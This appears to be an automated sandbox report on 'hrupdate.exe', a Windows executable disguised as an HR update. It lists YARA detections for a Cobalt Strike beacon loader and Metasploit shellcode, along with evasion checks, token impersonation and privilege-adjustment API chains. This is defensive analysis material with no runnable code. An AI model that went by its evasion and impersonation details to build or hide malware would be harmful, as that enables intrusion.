      Source: 00000000.00000003.1854632916.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
      Source: 00000000.00000003.1854632916.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 00000000.00000003.1854632916.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 00000000.00000003.1854632916.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
      Source: 00000000.00000003.1920477423.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
      Source: 00000000.00000003.1920477423.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 00000000.00000003.1920477423.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 00000000.00000003.1920477423.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
      Source: 00000000.00000003.2236236442.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
      Source: 00000000.00000003.2236236442.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 00000000.00000003.2236236442.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 00000000.00000003.2236236442.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
      Source: 00000000.00000003.2872941960.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
      Source: 00000000.00000003.2872941960.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 00000000.00000003.2872941960.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 00000000.00000003.2872941960.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
      Source: classification engineClassification label: mal96.troj.evad.winEXE@1/0@2/1
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FC77F5 LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,0_2_04FC77F5
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FCA1AE CreateThread,GetModuleHandleA,GetProcAddress,CreateToolhelp32Snapshot,Thread32First,Thread32Next,Sleep,0_2_04FCA1AE
      Source: C:\Users\user\Desktop\hrupdate.exeCommand line argument: slv0_2_00B01480
      Source: C:\Users\user\Desktop\hrupdate.exeCommand line argument: SibcorUpdate0_2_00B01480
      Source: C:\Users\user\Desktop\hrupdate.exeCommand line argument: SIBCORUPDATE0_2_00B01480
      Source: C:\Users\user\Desktop\hrupdate.exeCommand line argument: SIBCORUPDATE0_2_00B01480
      Source: C:\Users\user\Desktop\hrupdate.exeCommand line argument: SibcorUpdate0_2_00B01480
      Source: C:\Users\user\Desktop\hrupdate.exeCommand line argument: SIBCORUPDATE0_2_00B01480
      Source: C:\Users\user\Desktop\hrupdate.exeCommand line argument: @qv0_2_00B01480
      Source: hrupdate.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\hrupdate.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: msvcp140.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: vcruntime140.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: napinsp.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: wshbth.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: winrnr.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: napinsp.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: wshbth.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: winrnr.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: hrupdate.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: hrupdate.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: hrupdate.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: hrupdate.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: hrupdate.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: hrupdate.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: hrupdate.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: hrupdate.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: C:\Users\dan\source\repos\hrtraining\Release\hrupdate.pdb source: hrupdate.exe
      Source: Binary string: C:\Users\dan\source\repos\hrtraining\Release\hrupdate.pdb%% source: hrupdate.exe
      Source: hrupdate.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: hrupdate.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: hrupdate.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: hrupdate.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: hrupdate.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FEECF7 LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,FreeLibrary,0_2_04FEECF7
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_030D0710 push cs; iretd 0_3_030D0714
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_030D3B29 push cs; iretd 0_3_030D3B30
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_030D5143 push cs; iretd 0_3_030D5144
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_030D4F77 push cs; iretd 0_3_030D4F78
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_030D1DBE push cs; iretd 0_3_030D1DC8
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_030D43DF push cs; iretd 0_3_030D43E4
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_030D01F9 push ebp; ret 0_3_030D01FA
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_030D07F3 push cs; iretd 0_3_030D07F4
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_030D4403 push cs; iretd 0_3_030D4404
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_030D241F push cs; iretd 0_3_030D2438
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_030D161B push cs; iretd 0_3_030D161C
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_030D2816 push ds; iretd 0_3_030D281C
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_030D3422 push cs; iretd 0_3_030D3428
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_030D123C push cs; iretd 0_3_030D12AC
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_030D2053 push cs; iretd 0_3_030D2054
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_030D3A75 push cs; iretd 0_3_030D3A7C
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_030D2077 push cs; iretd 0_3_030D2078
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_030D1683 push cs; iretd 0_3_030D1684
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_030D2497 push cs; iretd 0_3_030D2498
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_030D38AF push cs; iretd 0_3_030D38B0
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_030D4AB8 push cs; iretd 0_3_030D4AC4
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_030D42CB push cs; iretd 0_3_030D42CC
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_030D2AC5 push cs; iretd 0_3_030D2B0C
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_030D06D4 push cs; iretd 0_3_030D06E0
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_030D4AD6 push edi; retf 0_3_030D4AE4
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_030D38EC push cs; iretd 0_3_030D392C
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_030D34F0 push cs; iretd 0_3_030D34F4
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_00B038D6 push ecx; ret 0_2_00B038E9
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FDD7C0 push eax; ret 0_2_04FDD7C7
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FE0BB1 push ecx; ret 0_2_04FE0BC4
      Source: C:\Users\user\Desktop\hrupdate.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Contains functionality to detect sleep reduction / modifications
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FCBBF10_2_04FCBBF1
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FC6BE70_2_04FC6BE7
      Source: C:\Users\user\Desktop\hrupdate.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_0-18421
      Source: C:\Users\user\Desktop\hrupdate.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-16394
      Source: C:\Users\user\Desktop\hrupdate.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-16381
      Source: C:\Users\user\Desktop\hrupdate.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-16649
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FC6BE70_2_04FC6BE7
      Source: C:\Users\user\Desktop\hrupdate.exe TID: 7484Thread sleep time: -120000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FCE544 _malloc,__snprintf,FindFirstFileA,_malloc,__snprintf,FindNextFileA,FindClose,0_2_04FCE544
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FC8839 _malloc,_memset,_strncmp,GetCurrentDirectoryA,FindFirstFileA,GetLastError,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,0_2_04FC8839
      Source: hrupdate.exe, 00000000.00000002.2942922670.000000000124E000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.2166447850.000000000128F000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.2236318352.000000000128F000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.2325730281.000000000128E000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.2303657563.000000000128E000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000002.2942922670.0000000001289000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.2259042912.000000000128F000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.2211659727.000000000128F000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.2188630065.000000000128F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\hrupdate.exeAPI call chain: ExitProcess graph end nodegraph_0-16650
      Source: C:\Users\user\Desktop\hrupdate.exeAPI call chain: ExitProcess graph end nodegraph_0-17021
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FDD81B LdrInitializeThunk,0_2_04FDD81B
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_00B0364F IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B0364F
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FEECF7 LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,FreeLibrary,0_2_04FEECF7
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_030DCA68 mov eax, dword ptr fs:[00000030h]0_3_030DCA68
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_030DBE95 mov eax, dword ptr fs:[00000030h]0_3_030DBE95
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FEEE9D VirtualQuery,GetModuleFileNameW,GetPdbDll,GetProcAddress,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,0_2_04FEEE9D
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_00B03084 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00B03084
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_00B0364F IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B0364F
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_00B037E2 SetUnhandledExceptionFilter,0_2_00B037E2
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FE1CCF _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_04FE1CCF
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FE555E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_04FE555E
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FD33CB LogonUserA,GetLastError,ImpersonateLoggedOnUser,GetLastError,0_2_04FD33CB
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FD359B GetCurrentProcessId,AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_04FD359B
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_00B0390E cpuid 0_2_00B0390E
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: GetLocaleInfoA,0_2_04FEB0B0
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FC78A5 CreateNamedPipeA,0_2_04FC78A5
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_00B0353E GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00B0353E
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_00B01480 WSAStartup,GetUserNameW,wcstombs_s,memset,strncat,WSACleanup,LoadStringW,LoadStringW,LoadStringW,LoadIconW,LoadIconW,LoadCursorW,LoadIconW,RegisterClassExW,CreateWindowExW,UpdateWindow,LoadIconW,lstrcpyW,Shell_NotifyIconW,LoadAcceleratorsW,GetMessageW,GetMessageW,DialogBoxParamW,TranslateAcceleratorW,TranslateMessage,DispatchMessageW,GetMessageW,terminate,0_2_00B01480
      Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04FCBCA3 GetUserNameA,GetComputerNameA,GetModuleFileNameA,_strrchr,GetVersionExA,__snprintf,0_2_04FCBCA3
      Source: C:\Users\user\Desktop\hrupdate.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Remote Access Functionality

      barindex
      Yara detected CobaltStrike
      Source: Yara matchFile source: 00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.2210862324.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.2873052676.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.2325614801.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.2258966363.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.2166372998.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.1920557369.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.1737677709.0000000001272000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.2009759861.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.2391768774.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.2369855570.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.1787841021.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.1787904161.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.2672627647.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.2303560240.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.1942656539.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.2942922670.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.2505022354.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.2347750483.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.2188557331.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.1854632916.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.1920477423.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
